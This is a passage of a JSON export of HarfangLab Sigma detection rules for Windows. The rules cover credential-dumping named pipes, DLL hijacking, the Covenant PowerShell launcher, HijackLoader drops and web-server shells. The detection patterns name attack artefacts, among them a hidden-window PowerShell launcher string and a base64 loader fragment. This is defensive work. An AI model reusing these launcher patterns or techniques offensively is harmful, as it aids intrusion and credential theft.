'\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\Program Files (x86)\\'\n - '\\cmd.exe /c ?:\\Program Files\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' ?:\\users\\\\*\\AppData\\Roaming\\\\\\\\svchost\\FTJmqGbe.tmp' # http://www.global-imaging.net/solutions.htm\n - 'cscript //E:JScript //nologo ?:\\Users\\\\*\\\\* ScoreGym*\\ScoreGym\\update\\tools\\base64.bat'\n - '?:\\windows\\temp\\psappdeploytoolkit\\'\n - '?:\\WINDOWS\\SystemTemp\\PSAppDeployToolkit\\'\n - '\\PSAppDeployToolkit\\ExecuteAsUser\\PSAppDeployToolkit-ExecuteAsUser.vbs'\n - 'cscript.exe //e:vbscript *\\TSS\\psSDP\\Diag\\global\\Autoruns.vbs ' # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-tss/introduction-to-troubleshootingscript-toolset-tss\n - 'cscript.exe //B //Nologo //E:vbs ?:\\Program Files\\'\n - 'cscript.exe //B //Nologo //E:vbs ?:\\Program Files (x86)\\'\n - 'WScript.exe /E:vbs ?:\\ProgramData\\Thinstall\\UnRegister\\'\n - 'cscript //E:JScript //nologo ?:\\Users\\\\*\\Desktop\\'\n\n exclusion_parentimage:\n ParentImage: '?:\\Windows\\System32\\spoolsv.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n - '?:\\Program Files (x86)\\Meraki\\PCC Agent *\\m_agent_service.exe'\n - '?:\\Program Files\\Meraki\\PCC Agent *\\m_agent_service.exe'\n\n exclusion_amd:\n CommandLine|endswith: '//e:vbscript //B //NOLOGO'\n ParentImage|endswith:\n - '\\AMD_Chipset_Software.exe'\n - '\\AMD_Chipset_Drivers.exe'\n\n # https://github.com/JohnWhy/Anti-AFK-Batch-File/blob/master/afker.bat\n exclusion_afker:\n CommandLine:\n - 'CScript //nologo //E:JScript *\\afker.bat {NUMLOCK}'\n - 'CScript //nologo //E:JScript *\\av.bat {NUMLOCK}'\n\n condition: selection_image and (not filter_cmd or selection_cmd) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f86d2a63-b9d6-453e-a211-26ff34ee6cce",
"rule_name": "Suspicious Script Execution with Specified Engine Parameter",
"rule_description": "Detects the suspicious execution of a Windows script engine with a parameter specifying the language to use.\nThis technique has been used by attackers to execute files with misleading extensions. For instance, it was used by the OSTAP JScript downloader to execute malicious code from Office macro.\nIt is recommended to investigate the parent process performing this action, the action performed by the child process and to analyze the script file itself to look for malicious content.\n",
"rule_creation_date": "2023-12-05",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1059.007",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f87fa54f-f27d-4a98-8d96-b6eadfb2453e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074756Z",
"creation_date": "2026-03-23T11:45:34.074758Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074763Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credential_dumping_named_pipes_creation.yml",
"content": "title: Named Pipe Created Associated with Credential Dumping Tools\nid: f87fa54f-f27d-4a98-8d96-b6eadfb2453e\ndescription: |\n Detects a suspicious attempt to dump credentials in Windows using tools that create named pipes.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n Is is recommended to analyze the process responsible for the creation of the named pipe and to look for other suspicious activities on the host.\nreferences:\n - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/07/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|contains:\n - '\\lsadump'\n - '\\cachedump'\n - '\\wceservicepipe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f87fa54f-f27d-4a98-8d96-b6eadfb2453e",
"rule_name": "Named Pipe Created Associated with Credential Dumping Tools",
"rule_description": "Detects a suspicious attempt to dump credentials in Windows using tools that create named pipes.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIs is recommended to analyze the process responsible for the creation of the named pipe and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f8d10e3f-c21e-4c10-aa29-c702118c7fdf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096060Z",
"creation_date": "2026-03-23T11:45:34.096063Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md#atomic-test-1---dll-search-order-hijacking---amsidll",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_powershell.yml",
"content": "title: DLL Hijacking via PowerShell.exe\nid: f8d10e3f-c21e-4c10-aa29-c702118c7fdf\ndescription: |\n Detects potential Windows DLL Hijacking via PowerShell.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md#atomic-test-1---dll-search-order-hijacking---amsidll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PowerShell.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\windows.storage.dll'\n - '\\amsi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n condition: selection and not 1 of filter_*\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f8d10e3f-c21e-4c10-aa29-c702118c7fdf",
"rule_name": "DLL Hijacking via PowerShell.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PowerShell.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f962a0cd-a955-4f9d-b311-f8b24582526d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609268Z",
"creation_date": "2026-03-23T11:45:34.609272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609279Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_covenant_powershell_launcher.yml",
"content": "title: Covenant PowerShell Launcher Detected\nid: f962a0cd-a955-4f9d-b311-f8b24582526d\ndescription: |\n Detects execution of Covenant PowerShell Launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as to look for suspicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/11/10\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Covenant\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection_1:\n PowershellCommand|contains:\n - ' -Sta -Nop -Window Hidden -Command '\n - ' -Sta -Nop -Window Hidden -EncodedCommand '\n selection_2:\n PowershellCommand|contains:\n - 'sv o (New-Object IO.MemoryStream);'\n - 'cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwB'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\PrivateMethods.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\PrivateMethods.ps1'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f962a0cd-a955-4f9d-b311-f8b24582526d",
"rule_name": "Covenant PowerShell Launcher Detected",
"rule_description": "Detects execution of Covenant PowerShell Launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for suspicious actions stemming from the PowerShell host process.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f96e0d60-4942-4628-b92c-7c662578aa9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604401Z",
"creation_date": "2026-03-23T11:45:34.604404Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604411Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/012/",
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/"
],
"name": "t1055_012_suspicious_file_dropped_hijackloader.yml",
"content": "title: HijackLoader Dropped File\nid: f96e0d60-4942-4628-b92c-7c662578aa9b\ndescription: |\n Detects the creation of StrCmp.exe in the AppData folder.\n HijackLoader creates and executes StrCmp.exe in the AppData folder for process hollowing purposes.\n HijackLoader is a defense evasion oriented loader relying mostly on DLL sideloading and a custom variant of process hollowing.\n It usually drops stealers as final payloads.\n It is recommended to analyze the process responsible for writing the StrCmp file to disk to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1055/012/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\ndate: 2024/09/16\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.Filesystem\n - classification.Windows.Loader.HijackLoader\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\StrCmp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f96e0d60-4942-4628-b92c-7c662578aa9b",
"rule_name": "HijackLoader Dropped File",
"rule_description": "Detects the creation of StrCmp.exe in the AppData folder.\nHijackLoader creates and executes StrCmp.exe in the AppData folder for process hollowing purposes.\nHijackLoader is a defense evasion oriented loader relying mostly on DLL sideloading and a custom variant of process hollowing.\nIt usually drops stealers as final payloads.\nIt is recommended to analyze the process responsible for writing the StrCmp file to disk to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2024-09-16",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f9798db9-3af5-4b00-9a78-5a7bf8d90ed1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077851Z",
"creation_date": "2026-03-23T11:45:34.077853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077857Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_expand.yml",
"content": "title: DLL Hijacking via expand.exe\nid: f9798db9-3af5-4b00-9a78-5a7bf8d90ed1\ndescription: |\n Detects potential Windows DLL Hijacking via expand.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'expand.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f9798db9-3af5-4b00-9a78-5a7bf8d90ed1",
"rule_name": "DLL Hijacking via expand.exe",
"rule_description": "Detects potential Windows DLL Hijacking via expand.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f99772ac-fdaa-4cf6-9c2b-59afab8387e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098334Z",
"creation_date": "2026-03-23T11:45:34.098336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pnpunattend.yml",
"content": "title: DLL Hijacking via pnpunattend.exe\nid: f99772ac-fdaa-4cf6-9c2b-59afab8387e9\ndescription: |\n Detects potential Windows DLL Hijacking via pnpunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pnpunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DEVRTL.dll'\n - '\\newdev.dll'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f99772ac-fdaa-4cf6-9c2b-59afab8387e9",
"rule_name": "DLL Hijacking via pnpunattend.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pnpunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f9ee660e-81ec-4e3b-9897-8e9e23dba22b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072044Z",
"creation_date": "2026-03-23T11:45:34.072046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072050Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_windows_webshell.yml",
"content": "title: Shell Process Spawned by Web Server\nid: f9ee660e-81ec-4e3b-9897-8e9e23dba22b\ndescription: |\n Detects the suspicious invocation of a shell process by a web server\n Attackers can use vulnerabilities present in web applications to execute malicious code on a web server.\n Is is recommended to analyze the executed shell command to determine its legitimacy in the context of the running web application.\nreferences:\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2021/04/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n ParentImage|endswith:\n - '\\w3wp.exe' # IIS\n - '\\httpd.exe' # Apache\n - '\\nginx.exe'\n - '\\php-cgi.exe'\n - '\\tomcat.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7.exe\n # C:\\Program Files\\Tomcat\\bin\\tomcat8.exe\n # C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\bin\\Tomcat9.exe\n - '\\tomcat?.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7w.exe\n - '\\tomcat??.exe'\n # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html\n - '\\UMWorkerProcess.exe' # ProxyLogon vulnerability\n - '\\ws_TomcatService.exe' # VMware Horizon exploitation (https://twitter.com/redcanary/status/1482100290698375169)\n selection_2:\n - Image|endswith:\n - '\\cmd.exe'\n - '\\command.com'\n - '\\powershell.exe'\n - '\\pwsh.exe' # PowerShell 6+\n - '\\bitsadmin.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n # cygwin or WSL\n - '\\sh.exe'\n - '\\bash.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe (PowerShell 6)\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n\n exclusion_fp:\n CommandLine:\n - 'cmd.exe /c echo %windir%'\n - 'CMD /C wmic os get Caption /value'\n - 'cmd.exe /s /c CMD /D /C powershell [System.Text.Encoding]::Default'\n - 'cmd.exe /c tasklist /FI PID eq * /FO CSV /NH'\n - 'cmd.exe /s /c echo EXEC'\n - 'cmd.exe /s /c for %F in * do @echo %~zF'\n - 'cmd.exe /c wmic NICCONFIG get DNSServerSearchOrder /format:CSV'\n\n exclusion_exchange_owa:\n # \"cmd.exe\" /c ver\n CommandLine: '?cmd.exe? /c ver'\n # parent commandline : c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm0c0ece8b-b171-4c37-b00b-f7ae3736eed0 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0\n ParentCommandLine|contains: 'MSExchangeOWAAppPool'\n\n exclusion_fortinet:\n CommandLine: 